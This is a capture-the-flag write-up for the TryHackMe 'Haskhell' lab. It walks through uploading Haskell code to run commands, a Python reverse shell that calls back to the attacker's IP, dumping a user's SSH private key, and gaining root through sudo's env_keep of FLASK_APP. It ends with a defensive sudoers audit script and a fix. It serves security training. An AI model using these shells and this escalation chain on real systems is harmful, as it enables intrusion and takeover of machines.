
TryHackMe: Haskhell


Enumeration

root@osboxes:~/Documents/haskell# cat scan.txt 
[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,5001
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
|   256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
|_  256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (ED25519)
5001/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Homepage
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
	 TTL: 0
	 Furious: 26
	 Nmap: 31
	 Total: 57

The web looks like this:

Web interface

Opened the homework link:

Web homework

It seems there may be some URL to upload Haskell code, which the web app then compiles and executes.

Enumerated hidden paths with dirsearch and, as expected, found the upload endpoint:

root@osboxes:~/Downloads/dirsearch# python3 dirsearch.py -E -u http://10.10.132.211:5001

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | HTTP method: get | Threads: 10 | Wordlist size: 6487 | Request count: 6487

Error Log: /root/Downloads/dirsearch/logs/errors-20-08-01_17-15-01.log

Target: http://10.10.132.211:5001

Output File: /root/Downloads/dirsearch/reports/10.10.132.211/20-08-01_17-15-01

[17:15:01] Starting: 
[17:15:31] 500 -  291B  - /uploads/dump.sql
[17:16:12] 200 -  237B  - /submit

Task Completed

Checked the submit webpage:

Upload file

Intrusion

First of all, I checked two things at once: whether Python is installed (to run a reverse shell with it) and whether the uploaded code can execute system commands at all:

module Main where

import System.Process

-- callCommand hands the string to /bin/sh, so shell operators such as || work
main :: IO ()
main = callCommand "which python || which python3"

Got the following output:

[1 of 1] Compiling Main             ( /home/flask/uploads/exec.hs, /home/flask/uploads/exec.o )
Linking /home/flask/uploads/exec ...
/usr/bin/python

Python is present and the command ran, so the next step is a reverse shell:

import socket,subprocess,os
from flask import Flask
app = Flask(__name__)

@app.route('/')
def home():
    # Connect back to the listener and point stdin/stdout/stderr at the socket
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("10.9.31.216",1212))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    # The shell inherits the duplicated descriptors and runs as the Flask process's user
    p = subprocess.call(["/bin/sh","-i"])
    return "You just got pwned!"

if __name__ == '__main__':
    app.run(debug=True)

Logged in as the flask user, we can read the user flag (it is world-readable, so no extra privilege is needed):

flask@haskhell:~$ find / -name user.txt 2>/dev/null
/home/prof/user.txt
flask@haskhell:~$ ls -l /home/prof/user.txt
-rw-r--r-- 1 root root 26 May 27 19:06 /home/prof/user.txt

Privesc

During enumeration I found an SSH private key belonging to prof:

flask@haskhell:~$ find / -name id_rsa 2>/dev/null
/home/prof/.ssh/id_rsa
flask@haskhell:~$ cat /home/prof/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA068E6x8/vMcUcitx9zXoWsF8WjmBB04VgGklNQCSEHtzA9cr
94rYpUPcxxxYyw/dAii0W6srQuRCAbQxO5Di+tv9aWXmBGMEt0/3tOE7D09RhZGQ
b68lAFDjSSJaVlVzPi+waotyP2ccVJDjXkwK0KIm6RsACIOhM9GtI2wyZ6vOg4ss
Nb+7UY60iOkcOAWP09Omzjc2q7hcE6CuV6f7+iObamfGlZ4QQ5IvUj0etStDD6iU
WQX4vYewYqUz8bedccFvpC6uP2FGvDONYXrLWWua7wlwSgOqeXXxkG7fxVqYY2++
6ZVm8RE7TpPNxsQNDwpnxOiwTxGMgCrIMxgRVwIDAQABAoIBAQCTLXbf+wQXvtrq
XmaImQSKRUiuepjJeXLdqz1hUpo7t3lKTEqXfAQRM9PG5GCgHtFs9NwheCtGAOob
wSsR3TTTci0JIP4CQs4+nez96DNl+6IUmhawcDfrtlGwwZ/JsvPDYujnyziN+KTr
7ykGoRxL3tHq9Qja4posKzaUEGAjTz8NwrhzB6xatsmcWBV0fFoWzpS/xWzW3i7F
gAoYxc6+4s5bKHsJima2Aj5F3XtHfipkMdBvbl+sjGllgiQn/oEjYMIX5wc7+se2
o7FERO2oy3I5jUOlULsr9BwQpNFA2Qenc4Wc7ghb0LfCVaUs/RHQ7IQ4F3yp/G67
54oLue6hAoGBAPCe+WsnOXzhwQ9WXglhfztDR1lcwSFMeHZpcxYUVqmVEi2ZMLll
B67SCri9lHHyvBtrH7YmZO5Q9UcGXdLCZGmbkJUdX2bjqV0zwwx1qOiVY8LPnZSJ
LJN+0p1dRHsO3n4vTHO8mVuiM5THi6pcgzSTggIhS+e1ks7nlQKiBuD/AoGBAOE2
kwAMtvI03JlkjvOHsN5IhMbOXP0zaRSrKZArDCcqDojDL/AQltQkkLtQPdUPJgdY
3gOkUJ2BCHNlIsAtUjrTj+T76N512rO2sSidOEXRDCc+g/QwdgENiq/w9JroeWFc
g9qM3f2cl/EkjxRgiyuTfK6mbzcuMSveX4LfCXepAoGAd2MZc+4ZWvoUNUzwCY2D
eF8QVqlr9d6gYng9rvXWbfvV8iPxBfu3zSjQQwtlTQhYBu6m5FS2fXxTxrLE+J6U
/cU+/o19WWqaDPFy1IrIjOYagn1KvXk2UdR6IbQ2FyywfkFvmHk6Sjn3h9leVd/j
BcIunmnw5H214s0KpSzJZvcCgYA5Ca9VNeMnmIe+OZ+Swezjfw5Ro3YdkmWsnGTc
ZGqhiJ9Bt91uOWVZuSEGr53ZVgrVlYY0+eqI2WMghp60eUX4LBinb71cihCnrz9S
/+5+kCE51zVoJNXeEmXrhWUNzo7fP6UNNtwKHRzGL/IkwQa+NI5BVVmZahN9/sXF
yWMGcQKBgQDheyI7eKTDMsrEXwMUpl5aiwWPKJ0gY/2hS0WO3XGQtx6HBwg6jJKw
MMn8PNqYKF3DWex59PYiy5ZL1pUG2Y+iadGfIbStSZzN4nItF5+yC42Q2wlhtwgt
i4MU8bepL/GTMgaiR8RmU2qY7wRxfK2Yd+8+GDuzLPEoS7ONNjLhNA==
-----END RSA PRIVATE KEY-----

Used it to connect through ssh:

root@osboxes:~/Documents/haskell# chmod 600 id_rsa 
root@osboxes:~/Documents/haskell# ssh -i id_rsa prof@10.10.159.239
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Aug  2 00:04:41 UTC 2020

  System load:  0.0                Processes:           99
  Usage of /:   26.3% of 19.56GB   Users logged in:     0
  Memory usage: 69%                IP address for eth0: 10.10.159.239
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


Last login: Wed May 27 18:45:06 2020 from 192.168.126.128
$ 

Upgraded the tty and listed sudo perms:

prof@haskhell:~$ sudo -l
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run

Created a payload flask app:

prof@haskhell:~$ cat flask_reverse.py 
import socket,subprocess,os
from flask import Flask
app = Flask(__name__)

@app.route('/')
def home():
    # Connect back to the listener and point stdin/stdout/stderr at the socket
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("10.9.31.216",1212))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    # The shell inherits the duplicated descriptors and runs as whoever started flask run (root via sudo)
    p = subprocess.call(["/bin/sh","-i"])
    return "You just got pwned!"

# Never reached under `flask run`, which imports the module and starts its own server
if __name__ == '__main__':
    app.run(debug=True)

Then tried running it with sudo but got the following error:

prof@haskhell:~$ sudo /usr/bin/flask run
Usage: flask run [OPTIONS]

Error: Could not locate Flask application. You did not provide the FLASK_APP environment variable.

For more information see http://flask.pocoo.org/docs/latest/quickstart/

So the variable has to be exported before running. This is the whole bug: sudo's env_reset would normally drop it, but env_keep+=FLASK_APP lets prof's environment choose which module root's flask run imports:

prof@haskhell:~$ export FLASK_APP=flask_reverse.py
prof@haskhell:~$ sudo /usr/bin/flask run
 * Serving Flask app "flask_reverse"
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

Then, from another console, started a listener on port 1212 and requested the malicious Flask app (it listens only on 127.0.0.1:5000, so the request has to come from the target itself) to get root:

root@osboxes:~/Documents/haskell# rlwrap nc -lvnp 1212
listening on [any] 1212 ...
connect to [10.9.31.216] from (UNKNOWN) [10.10.159.239] 37094
# id
uid=0(root) gid=0(root) groups=0(root)
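The whole chain hinges on one sudoers combination: env_keep+=FLASK_APP next to a NOPASSWD flask run. sudo strips the caller's environment by default (env_reset is in the Defaults above), and the explicit exception hands root's flask the caller's choice of module. Below is an added audit check, my code rather than the post's, that parses sudo -l output and pairs every preserved variable from a short hand-written table with each allowed command it can influence. SAMPLE_SUDO_L is a constructed copy of the sudo -l output shown above; the function names and the DANGEROUS_ENV table are my own.

```python
"""Audit `sudo -l` output for a preserved environment variable that a
NOPASSWD command will honour, the pattern behind this box's privesc.

Added example, not part of the original post. SAMPLE_SUDO_L is a constructed
copy of the sudo -l output above; DANGEROUS_ENV is a short hand-written
table, not an exhaustive one.
"""
import re
import sys

# Variable -> regex over the allowed command in which that variable matters.
DANGEROUS_ENV = {
    "FLASK_APP": r"\bflask\b",          # flask run imports whatever FLASK_APP names
    "PYTHONPATH": r"python|flask|pip",  # module search path for any Python entry point
    "PERL5LIB": r"\bperl\b",
    "LD_PRELOAD": r".",                 # shared object injected into any dynamic binary
    "LD_LIBRARY_PATH": r".",
    "BASH_ENV": r"\b(ba)?sh\b",         # sourced by non-interactive bash
}

SAMPLE_SUDO_L = """\
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run
"""


def parse_sudo_l(text):
    """Return (env_keep variables, rules) from sudo -l text.

    Each rule is (runas, nopasswd, command). env_keep accepts both the
    single-word form seen here and the quoted list form env_keep+="A B".
    """
    env_keep = set()
    for m in re.finditer(r'env_keep\s*\+?=\s*(?:"([^"]*)"|([^,\s]+))', text):
        env_keep.update((m.group(1) or m.group(2)).split())
    rules = []
    for m in re.finditer(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$", text, re.M):
        runas, tags, cmd = m.groups()
        rules.append((runas.strip(), "NOPASSWD:" in tags, cmd))
    return env_keep, rules


def find_env_abuse(env_keep, rules):
    """Pair every kept dangerous variable with each command it can influence."""
    findings = []
    for var, pattern in DANGEROUS_ENV.items():
        if var not in env_keep:
            continue
        for runas, nopasswd, cmd in rules:
            if re.search(pattern, cmd):
                findings.append({"var": var, "runas": runas,
                                 "nopasswd": nopasswd, "command": cmd})
    return findings


def audit(text):
    """Full check: parse sudo -l output, return the dangerous variable/command pairs."""
    return find_env_abuse(*parse_sudo_l(text))


if __name__ == "__main__":
    # usage: sudo -l | python3 sudo_env_audit.py   (falls back to the sample when run alone)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SUDO_L
    for f in audit(text):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f'{f["var"]} is kept and ({f["runas"]}) {tag}{f["command"]} honours it')
```

On this box the check reports FLASK_APP against (root) NOPASSWD /usr/bin/flask run, which is exactly the chain used above. The sudoers fix is to drop the env_keep exception and point the NOPASSWD entry at a root-owned wrapper that sets FLASK_APP to a fixed, non-writable path itself, so the caller's environment never decides what root imports.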


Written by ITasahobby, InTernet lover